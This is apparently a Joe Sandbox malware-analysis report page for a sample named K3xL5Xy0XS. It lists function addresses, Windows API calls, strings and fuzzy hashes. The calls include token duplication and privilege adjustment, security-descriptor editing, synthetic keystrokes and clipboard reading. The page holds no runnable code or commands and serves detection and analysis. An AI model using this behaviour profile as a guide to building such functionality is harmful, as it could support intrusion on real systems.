Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 1d8daf65caab410c502ba62da20a6cd1b7c8bcdcb67203f8acbed5b331cbdf57
Instruction ID: 9b0da1c530023d5734e8a11e390baf79f0b3cdb06a301c19b1020e6d6ed67a48
Opcode Fuzzy Hash: 1d8daf65caab410c502ba62da20a6cd1b7c8bcdcb67203f8acbed5b331cbdf57
Instruction Fuzzy Hash: A1E0CD726003245BC720D2589C09FEA77DDDFC8790F040075FD09E7248DA70ED808550

Function 00232693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 002326B5

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 592fb3e430a755235fae379242aa78deb486821a1a728582f0e49405a38b34c0
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 76E048F0609B009FDF3D5E28A8517B677D89F49300F00045EF59B82252E57268558A4D

Function 001C2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001C3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001C3908

Part of subcall function 001CD730: GetInputState.USER32 ref: 001CD807

SetCurrentDirectoryW.KERNEL32(?), ref: 001C2B6B

Part of subcall function 001C30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 001C314E

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: b44e2d7cb26366966af9ba89df15eeb03602746ec83d742709630611909e7b4d
Instruction ID: 8bf1fea48a9c0e9469fd624879179a6bee6b5fafe2c3fec760fe85e429ac6b4b
Opcode Fuzzy Hash: b44e2d7cb26366966af9ba89df15eeb03602746ec83d742709630611909e7b4d
Instruction Fuzzy Hash: A1E0262230030807CA04BB71B81AF7DB3498BF5311F40553EF05243162CF34C9664251

Function 0020039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00200704,?,?,00000000,?,00200704,00000000,0000000C), ref: 002003B7

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 88c518864a4e13f195031b00a5680258869b3ec871430c065cbdc467f92dd500
Instruction ID: 0720295fddca3022506c46010f9268e960cd6fecd709dc0ea9f4baaf97a77b9c
Opcode Fuzzy Hash: 88c518864a4e13f195031b00a5680258869b3ec871430c065cbdc467f92dd500
Instruction Fuzzy Hash: 26D06C3204020DBFDF028F84ED06EDA3BAAFB48714F118000BE1856020C732E821AB94

Function 001C1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 001C1CBC

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 2c66b6bba4316e9436b945ec97be67f93790591c761e494e9527d58b8dc281b9
Instruction ID: 4c1f891bee607bf468d6f7b0fa4632854cbf2df8665cc7188e5f18de1ea8d2d2
Opcode Fuzzy Hash: 2c66b6bba4316e9436b945ec97be67f93790591c761e494e9527d58b8dc281b9
Instruction Fuzzy Hash: EFC0923A280305EFF2188BD0FC4EF107764E348B01F948002F60DB95E3E3B22824EA58

Function 016853A8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 016853B9

Memory Dump Source

Source File: 00000000.00000002.1708037599.0000000001683000.00000040.00000020.00020000.00000000.sdmp, Offset: 01683000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1683000_K3xL5Xy0XS.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 1fbf3eb4b4e6dbfcb83c526dbe2e576ff72301c925eaec867cfb014da50f4dc9
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 27E0E67494010DDFDB00EFB4D94969D7BB4EF04301F100261FD01D2280D6709D508A62

Non-executed Functions

Function 00259576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0025961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0025965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0025969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002596C9
SendMessageW.USER32 ref: 002596F2
GetKeyState.USER32(00000011), ref: 0025978B
GetKeyState.USER32(00000009), ref: 00259798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002597AE
GetKeyState.USER32(00000010), ref: 002597B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002597E9
SendMessageW.USER32 ref: 00259810
SendMessageW.USER32(?,00001030,?,00257E95), ref: 00259918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0025992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00259941
SetCapture.USER32(?), ref: 0025994A
ClientToScreen.USER32(?,?), ref: 002599AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002599BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002599D6
ReleaseCapture.USER32 ref: 002599E1
GetCursorPos.USER32(?), ref: 00259A19
ScreenToClient.USER32(?,?), ref: 00259A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00259A80
SendMessageW.USER32 ref: 00259AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00259AEB
SendMessageW.USER32 ref: 00259B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00259B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00259B4A
GetCursorPos.USER32(?), ref: 00259B68
ScreenToClient.USER32(?,?), ref: 00259B75
GetParent.USER32(?), ref: 00259B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00259BFA
SendMessageW.USER32 ref: 00259C2B
ClientToScreen.USER32(?,?), ref: 00259C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00259CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00259CDE
SendMessageW.USER32 ref: 00259D01
ClientToScreen.USER32(?,?), ref: 00259D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00259D82

Part of subcall function 001D9944: GetWindowLongW.USER32(?,000000EB), ref: 001D9952

GetWindowLongW.USER32(?,000000F0), ref: 00259E05

Strings

F, xrefs: 00259D07
p#), xrefs: 00259990
@GUI_DRAGID, xrefs: 0025997D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#)
API String ID: 3429851547-2847612385
Opcode ID: 126b583246bde045ce83edfda7638113d83bd11ac061d5cfc04a04bf5113c29b
Instruction ID: 3b8862bddb4468ebde03316c7d8b195e5a8812f3289cd174d73582fe3dcaf388
Opcode Fuzzy Hash: 126b583246bde045ce83edfda7638113d83bd11ac061d5cfc04a04bf5113c29b
Instruction Fuzzy Hash: F5429E30614302EFDB25CF24DD48AAABBE9FF49311F10061AF959872A1D771D8A8DF49

Function 00254873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002548F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00254908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00254927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0025494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0025495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0025497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002549AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002549D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00254A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00254A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00254A7E
IsMenu.USER32(?), ref: 00254A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00254AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00254B20
GetWindowLongW.USER32(?,000000F0), ref: 00254B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00254BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00254C82
wsprintfW.USER32 ref: 00254CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00254CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00254CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00254D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00254D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00254D5A

Strings

%d/%02d/%02d, xrefs: 00254CA8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: a3a6f92686ccb8d93a019c5c2d67a8799064d0a379ef68d08e0a713f8854ef68
Instruction ID: 3fef23194d03ecbd4af76f68a7bb5262fd6aa79b19030858fe6c08ed0a20e43b
Opcode Fuzzy Hash: a3a6f92686ccb8d93a019c5c2d67a8799064d0a379ef68d08e0a713f8854ef68
Instruction Fuzzy Hash: A6121131510315AFEB24AF28DC49FAEBBF8EF84309F104119F816DA2D0D7749A95CB54

Function 001DF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 001DF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0021F474
IsIconic.USER32(00000000), ref: 0021F47D
ShowWindow.USER32(00000000,00000009), ref: 0021F48A
SetForegroundWindow.USER32(00000000), ref: 0021F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0021F4AA
GetCurrentThreadId.KERNEL32 ref: 0021F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0021F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0021F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0021F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0021F4DE
SetForegroundWindow.USER32(00000000), ref: 0021F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0021F4F6
keybd_event.USER32(00000012,00000000), ref: 0021F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0021F50B
keybd_event.USER32(00000012,00000000), ref: 0021F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0021F519
keybd_event.USER32(00000012,00000000), ref: 0021F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0021F528
keybd_event.USER32(00000012,00000000), ref: 0021F52D
SetForegroundWindow.USER32(00000000), ref: 0021F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0021F557

Strings

Shell_TrayWnd, xrefs: 0021F46F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: f14882ecf6b578f48606b22bca5eb9c00762960c90e13f955cb0bd5e4ceab413
Instruction ID: 65cb244ad6376371842e26a9ac84c51feff575176fa15634d61e42c0e9c39c2a
Opcode Fuzzy Hash: f14882ecf6b578f48606b22bca5eb9c00762960c90e13f955cb0bd5e4ceab413
Instruction Fuzzy Hash: 4F318E71A50318BFEB206FB55C4AFBF7EADEB44B51F200065FA00F61D1E6B05D50AAA4

Function 00221201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 002216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022170D
Part of subcall function 002216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022173A
Part of subcall function 002216C3: GetLastError.KERNEL32 ref: 0022174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00221286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002212A8
CloseHandle.KERNEL32(?), ref: 002212B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002212D1
GetProcessWindowStation.USER32 ref: 002212EA
SetProcessWindowStation.USER32(00000000), ref: 002212F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00221310

Part of subcall function 002210BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002211FC), ref: 002210D4
Part of subcall function 002210BF: CloseHandle.KERNEL32(?,?,002211FC), ref: 002210E9

Strings

, xrefs: 0022125A
Z(, xrefs: 00221392
default, xrefs: 0022130B
winsta0, xrefs: 002212CC

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z(
API String ID: 22674027-3330260838
Opcode ID: 5af3e12d662bfbf9b627d18a27a4309fee31ea1a31a5929df282b64a8abd4752
Instruction ID: ed5253685f2a23745e3c1939c94f2ee11e2c6f8ccbf9e947e59e891272e0cb72
Opcode Fuzzy Hash: 5af3e12d662bfbf9b627d18a27a4309fee31ea1a31a5929df282b64a8abd4752
Instruction Fuzzy Hash: 2E81897191031ABFDF20AFA4EC49FEE7BB9EF18704F144129F915A61A0D7718A64CB24

Function 00220B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00221114
Part of subcall function 002210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221120
Part of subcall function 002210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 0022112F
Part of subcall function 002210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221136
Part of subcall function 002210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0022114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00220BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00220C00
GetLengthSid.ADVAPI32(?), ref: 00220C17
GetAce.ADVAPI32(?,00000000,?), ref: 00220C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00220C6D
GetLengthSid.ADVAPI32(?), ref: 00220C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00220C8C
HeapAlloc.KERNEL32(00000000), ref: 00220C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00220CB4
CopySid.ADVAPI32(00000000), ref: 00220CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00220CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00220D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00220D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220D45
HeapFree.KERNEL32(00000000), ref: 00220D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220D55
HeapFree.KERNEL32(00000000), ref: 00220D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220D65
HeapFree.KERNEL32(00000000), ref: 00220D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00220D78
HeapFree.KERNEL32(00000000), ref: 00220D7F

Part of subcall function 00221193: GetProcessHeap.KERNEL32(00000008,00220BB1,?,00000000,?,00220BB1,?), ref: 002211A1
Part of subcall function 00221193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00220BB1,?), ref: 002211A8
Part of subcall function 00221193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00220BB1,?), ref: 002211B7

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 3754a4b5c8ba4861954743992e24f16f2d648c8f9817a554242d3d0e3024c57c
Instruction ID: 968ce97ea80faa5a2c20454d101c710fd68e5e5bfd04c477e65e15e24ddd713d
Opcode Fuzzy Hash: 3754a4b5c8ba4861954743992e24f16f2d648c8f9817a554242d3d0e3024c57c
Instruction Fuzzy Hash: A4714A7191131ABFDF109FE4EC88BAEBBB8FF04311F144525E914A6192E771A915CF60

Function 0023EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0025CC08), ref: 0023EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0023EB37
GetClipboardData.USER32(0000000D), ref: 0023EB43
CloseClipboard.USER32 ref: 0023EB4F
GlobalLock.KERNEL32(00000000), ref: 0023EB87
CloseClipboard.USER32 ref: 0023EB91
GlobalUnlock.KERNEL32(00000000), ref: 0023EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0023EBC9
GetClipboardData.USER32(00000001), ref: 0023EBD1
GlobalLock.KERNEL32(00000000), ref: 0023EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0023EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0023EC38
GetClipboardData.USER32(0000000F), ref: 0023EC44
GlobalLock.KERNEL32(00000000), ref: 0023EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0023EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0023EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0023ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0023ECF3
CountClipboardFormats.USER32 ref: 0023ED14
CloseClipboard.USER32 ref: 0023ED59

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 09ef43b04a38d826855d6be97a4812d3babf8d99c41bb5b872767a60d3ad1b22
Instruction ID: 75b394e84fa4abf48aaeb186db17041b23493ef3468df3be0f3573b51c6bba10
Opcode Fuzzy Hash: 09ef43b04a38d826855d6be97a4812d3babf8d99c41bb5b872767a60d3ad1b22
Instruction Fuzzy Hash: A661DEB42043069FD700EF20E889F3AB7A9BF94704F25451DF8569B2E2DB70D909CB62

Function 0023698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002369BE
FindClose.KERNEL32(00000000), ref: 00236A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00236A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00236A75

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00236AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00236ADF

Strings

%02d, xrefs: 00236C00, 00236C0A, 00236C5A, 00236CAA, 00236CFA, 00236D4A
%4d, xrefs: 00236BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00236B32
%03d, xrefs: 00236DA2
%4d%02d%02d%02d%02d%02d, xrefs: 00236B6A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 27830e386077296d7e9688481be09475aafd31bda5300cb26015554d46654974
Instruction ID: bdc501db4081e35f9f9f2a219cf23db0fd1749b9adb2d15c6f4ff1dce1f4dd98
Opcode Fuzzy Hash: 27830e386077296d7e9688481be09475aafd31bda5300cb26015554d46654974
Instruction Fuzzy Hash: 60D161B2508304AFC310EFA4D896EABB7ECAFA9704F04491DF585D7191EB74DA44CB62

Function 00239642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00239663
GetFileAttributesW.KERNEL32(?), ref: 002396A1
SetFileAttributesW.KERNEL32(?,?), ref: 002396BB
FindNextFileW.KERNEL32(00000000,?), ref: 002396D3
FindClose.KERNEL32(00000000), ref: 002396DE
FindFirstFileW.KERNEL32(*.*,?), ref: 002396FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0023974A
SetCurrentDirectoryW.KERNEL32(00286B7C), ref: 00239768
